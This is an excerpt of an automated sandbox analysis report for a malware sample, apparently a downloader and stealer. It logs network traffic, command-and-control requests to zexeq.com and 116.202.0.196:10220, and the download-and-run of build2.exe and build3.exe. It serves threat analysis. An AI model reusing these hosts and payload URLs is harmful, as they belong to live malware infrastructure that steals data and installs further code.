                Source: Joe Sandbox ViewASN Name: TelmexColombiaSACO TelmexColombiaSACO
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B9CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00B9CF10
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /bg3goty HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
                Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
                Source: global trafficHTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: brusuax.com
                Source: global trafficHTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
                Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
                Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
                Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
                Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
                Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
                Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1960830157.0000000003AD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000003.1960992535.0000000003710000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000003.1961052135.0000000003710000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
                Source: unknownDNS traffic detected: queries for: api.2ip.ua
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2293082547.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2276086910.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310805053.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2006792138.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315470556.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2283667916.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295385362.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968891415.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233051739.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968233667.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2284812333.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2050797457.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2359837422.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000002.2362476595.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044340415.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1971446235.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://brusuax.com/dl/build2.exe
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1971446235.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294649164.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://brusuax.com/dl/build2.exe$run
                Source: build2.exe, 00000005.00000003.1767476575.0000000003111000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1766756030.000000000310E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                Source: build2.exe, 00000005.00000003.1767476575.0000000003111000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1766756030.000000000310E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/)
                Source: build2.exe, 00000005.00000003.1761763513.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2906708317.00000000006DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                Source: build2.exe, 00000005.00000002.2906708317.0000000000698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1965169628.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1965458151.0000000003AD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1960766095.0000000003AD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000003.1960866250.0000000003710000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1960897165.0000000003AD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.live.com/
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000003.1960930546.0000000003710000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.nytimes.com/
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeString found in binary or memory: http://www.openssl.org/support/faq.html
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1960956435.0000000003AD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.reddit.com/
                Source: build2.exe, 00000005.00000002.2909786657.00000000039BF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2919203598.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000003.1960992535.0000000003710000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.twitter.com/
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1961014542.0000000003AD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wikipedia.com/
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000003.1961052135.0000000003710000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000002.2369052197.0000000003610000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1971446235.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294649164.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe$run
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2293082547.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2276086910.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310805053.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2006792138.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000002.2368057315.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315470556.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2283667916.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295385362.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968891415.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233051739.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968233667.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2284812333.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2050797457.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2360968944.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2359837422.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044340415.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1971446235.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe$rune
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000002.2369052197.0000000003610000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exed
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044340415.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2284812333.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2359837422.0000000000EBC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2293082547.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2276086910.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310805053.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2006792138.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2050797457.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316287824.0000000000EAF000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968891415.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2006792138.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315470556.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315470556.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2293082547.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2283667916.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000002.2362476595.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295385362.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233051739.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310805053.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968891415.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/test1/get.php
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.0000000000A21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2293082547.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2276086910.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310805053.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2006792138.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315470556.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2283667916.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295385362.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968891415.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233051739.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968233667.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2284812333.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2050797457.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2359837422.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000002.2362476595.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044340415.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1971446235.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.0000000000A21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637;9
                Source: build2.exe, 00000005.00000003.1761711500.000000000070E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196/
                Source: build2.exe, 00000005.00000003.1761711500.000000000070E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2907267069.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848741906.0000000000735000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1851494817.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1851284140.0000000000734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196/S
                Source: build2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196/amData
                Source: build2.exe, 00000005.00000003.1761711500.000000000070E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2907267069.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848741906.0000000000735000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1851494817.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1851284140.0000000000734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196/n
                Source: build2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196/tdole2.tlbH
                Source: build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220
                Source: build2.exe, 00000005.00000003.1761711500.000000000070E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2907267069.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848741906.0000000000735000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1869958734.0000000003118000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848545716.0000000003120000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/
                Source: build2.exe, 00000005.00000003.1761711500.000000000070E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/(
                Source: build2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/(non)Standard
                Source: build2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/.0.196:10220/Chedot
                Source: build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/Microsoft
                Source: build2.exe, 00000005.00000002.2908682393.0000000003127000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848136191.0000000003118000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848545716.0000000003120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/My
                Source: build2.exe, 00000005.00000002.2907267069.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848741906.0000000000735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/c
                Source: build2.exe, 00000005.00000003.2848741906.0000000000735000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.0.196:10220/freebl3.dll
